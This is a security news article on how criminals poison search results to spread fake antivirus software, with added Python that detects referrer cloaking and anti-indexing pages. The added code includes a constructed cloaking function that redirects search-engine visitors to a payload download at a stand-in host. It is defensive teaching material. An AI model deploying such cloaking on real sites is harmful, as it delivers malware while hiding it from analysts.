Panda Security has revealed that cyber-criminals are manipulating search engine results to distribute malware, in particular, fake antivirus products.
‘The reason for this is simple – the criminals need to attract users to malicious sites in order to infect them,’ says Jeremy Matthews, head of Panda’s sub-Saharan operations. ‘What’s new, however, is the inventive ways they are drawing users to these Web pages.’
In the past, users were lured to compromised websites by mass spam campaigns. Targeted users read the emails, clicked on the links they contained and were unwittingly directed to a malicious Web page. Now there has been a change in strategy: because users are more wary of messages from unknown senders, criminals are using more effective ways of ensnaring new victims. They are using a Google tool called Google Trends which, among other things, lists the most popular searches of the day (anything from Obama’s inaugural address to the Oscar nominations).
Once they know the top searches and hot topics of the day, they create a blog stuffed with the most searched-for words (e.g. Obama, Penelope Cruz, etc.) and videos supposedly related to these topics. In this way they raise the blog’s ranking so that it appears among the user’s first search results.
“Users who trust these results will end up on a Web page where they will be asked to download a codec or plug-in, etc. in order to watch the video. If they do so, they will be downloading malware – in most cases a fake antivirus,” explains Matthews.
Fake antiviruses try to pass themselves off as real antivirus products and convince targeted users that they have been infected by malicious code. Victims are then prompted to buy the rogue antivirus to remove these bogus infections. Cyber-crooks are currently profiting substantially from this type of fraud.
This type of attack benefits from advanced SEO (Search Engine Optimization) techniques. These are legitimate Web programming techniques aimed at increasing the volume and quality of traffic to a website and improving its ranking in search engine result lists. One example is the web page selling the Malwaredoctor fake antivirus, which was designed specifically to achieve a high ranking in search engines.
In addition to standard SEO techniques, attackers also use techniques known as “Black Hat SEO”: illegitimate search engine positioning techniques used to bypass search engine policies, present alternative content or affect the user’s experience. Occasionally it can be difficult to determine whether a given technique is legitimate, as this can depend on the policies of the search engine.
Attackers are always keen to make it harder for anti-malware vendors to identify malicious sites. To this end they are starting to launch these attacks in a more advanced way: some of the malicious pages they control behave differently and show different content depending on where the visitor came from.
To hide the attack, a script is inserted that determines the origin of the visitor, typically from the HTTP Referer header. If a user types the URL directly into the browser’s address bar (so no referrer is sent), the legitimate, correct content is displayed. However, if the user arrived from a manipulated Google search, they are taken to the malicious Web page. The practical consequence for analysts is that fetching the URL directly shows only the benign version; any check has to reproduce the search-engine referrer.
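The cloaking described above, as an added example that is not Panda’s code or the attackers’ script: `cloaked_response` mimics the referrer check an attacker’s page performs (the hostnames, page bodies and the `rogue-av.example` URL are constructed), and `probe_for_cloaking` is the analyst-side check, fetching the same page under several visitor profiles and flagging the page when the bodies differ. `http_fetch_factory` is the live-network variant of the fetcher for use against a real URL.

```python
"""Referrer-based cloaking: the attacker-side decision and an analyst-side probe.

Added example, not from the original article. All hostnames, headers and
page bodies below are constructed for illustration.
"""
import hashlib
from urllib.parse import urlparse

SEARCH_ENGINES = ("google.", "bing.", "yahoo.")


def came_from_search(headers):
    """True when the Referer header points at a search engine (the signal the
    cloaking script keys on); absent or unrelated referrers return False."""
    ref = headers.get("Referer", "")
    host = urlparse(ref).netloc.lower()
    return any(se in host for se in SEARCH_ENGINES)


def cloaked_response(headers):
    """Constructed stand-in for the attacker's page: direct visitors get the
    benign blog, search-engine visitors get the rogue AV landing page."""
    if came_from_search(headers):
        return ("<html><body><script>location='http://rogue-av.example/codec.exe'"
                "</script></body></html>")
    return "<html><body>Welcome to our harmless blog.</body></html>"


# Visitor profiles an analyst should try; a direct fetch alone is not enough.
PROBES = {
    "direct": {},
    "google-referer": {"Referer": "http://www.google.com/search?q=obama+video"},
    "googlebot-ua": {"User-Agent": "Googlebot/2.1 (+http://www.google.com/bot.html)"},
}


def probe_for_cloaking(fetch, probes=PROBES):
    """Fetch the same URL under each profile and compare body digests.

    `fetch(headers) -> body`. Returns (is_cloaked, {profile: sha256 hex}).
    Any difference between profiles means the server varies content by origin.
    """
    digests = {name: hashlib.sha256(fetch(hdrs).encode()).hexdigest()
               for name, hdrs in probes.items()}
    return len(set(digests.values())) > 1, digests


def http_fetch_factory(url):
    """Build a real fetcher for a live URL (not exercised offline)."""
    import urllib.request

    def fetch(headers):
        req = urllib.request.Request(url, headers=headers)
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode("utf-8", "replace")
    return fetch


if __name__ == "__main__":
    cloaked, digests = probe_for_cloaking(cloaked_response)
    print("cloaking detected:", cloaked)
    for name, digest in digests.items():
        print(f"  {name:15} {digest[:16]}")
```

Two caveats when using the probe against real pages. Cloaking scripts in the wild also key on the client IP, geolocation or a first-visit cookie, so a single vantage point can still see the benign page under every profile; run the probes from more than one network before calling a page clean. And compare bodies after stripping volatile content (timestamps, ad slots), or every dynamic site will look cloaked.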
MSAntispyware 2009: A different example
PandaLabs recently detected a Web page that appeared to establish a new model. Pages selling fake antiviruses generally either contain no specific tags or contain tags designed to improve indexing in search engines; the page from which MSAntispyware 2009 was distributed represented a significant change. Here, all the tags and processes were designed to prevent the page from being indexed in search engines.
The aim was to make it more difficult for malware analysts and security companies to prevent infections using techniques such as discovering and blocking malicious URLs through search engine queries with specific parameters: a page that is never indexed cannot be found that way.
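A triage check for the anti-indexing behaviour just described, added here as an example and not PandaLabs’ tooling: it collects the signals a page can use to keep itself out of search engines (robots meta directives in the HTML, the X-Robots-Tag response header, and a robots.txt that disallows everything) and counts how many are present. The sample HTML, headers and robots.txt are constructed to resemble such a page.

```python
"""Flag pages that actively refuse search-engine indexing.

Added example, not from the original article. SAMPLE_* values are constructed.
"""
from html.parser import HTMLParser

ANTI_INDEX_DIRECTIVES = {"noindex", "nofollow", "noarchive", "nosnippet", "none"}


class RobotsMetaParser(HTMLParser):
    """Collect directives from <meta name="robots"|"googlebot"|"bingbot" content="...">."""

    def __init__(self):
        super().__init__()
        self.directives = set()

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("name", "").lower() in ("robots", "googlebot", "bingbot"):
            for d in a.get("content", "").lower().split(","):
                if d.strip():
                    self.directives.add(d.strip())


def header_directives(headers):
    """X-Robots-Tag carries the same directives outside the HTML body."""
    val = headers.get("X-Robots-Tag", "")
    return {d.strip().lower() for d in val.split(",") if d.strip()}


def robots_txt_blocks_all(robots_txt):
    """True if robots.txt has 'Disallow: /' under 'User-agent: *' (simplified parse)."""
    agent_all = False
    for line in robots_txt.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip().lower(), value.strip()
        if key == "user-agent":
            agent_all = (value == "*")
        elif key == "disallow" and agent_all and value == "/":
            return True
    return False


def anti_indexing_score(html, headers=None, robots_txt=""):
    """Return (score, findings): score is the number of independent
    anti-indexing signals present, findings describes each one."""
    headers = headers or {}
    findings = []
    parser = RobotsMetaParser()
    parser.feed(html)
    meta = parser.directives & ANTI_INDEX_DIRECTIVES
    if meta:
        findings.append("meta robots: " + ", ".join(sorted(meta)))
    hdr = header_directives(headers) & ANTI_INDEX_DIRECTIVES
    if hdr:
        findings.append("X-Robots-Tag: " + ", ".join(sorted(hdr)))
    if robots_txt_blocks_all(robots_txt):
        findings.append("robots.txt: Disallow: / for all agents")
    return len(findings), findings


# Constructed sample of a page that hides from search engines.
SAMPLE_HTML = """<html><head><title>Scan</title>
<meta name="robots" content="noindex, nofollow, noarchive">
<meta name="googlebot" content="nosnippet"></head>
<body>Your PC is infected!</body></html>"""
SAMPLE_HEADERS = {"X-Robots-Tag": "noindex"}
SAMPLE_ROBOTS = "User-agent: *\nDisallow: /\n"

if __name__ == "__main__":
    score, findings = anti_indexing_score(SAMPLE_HTML, SAMPLE_HEADERS, SAMPLE_ROBOTS)
    print("anti-indexing signals:", score)
    for f in findings:
        print("  -", f)
```

The score is a triage signal rather than a verdict: legitimate staging and login pages also carry `noindex`, so it is only meaningful when combined with the other features of a rogue AV page (the fake scan result, the codec or plug-in download prompt). Its value is that it catches exactly the pages a search-engine-query sweep would miss.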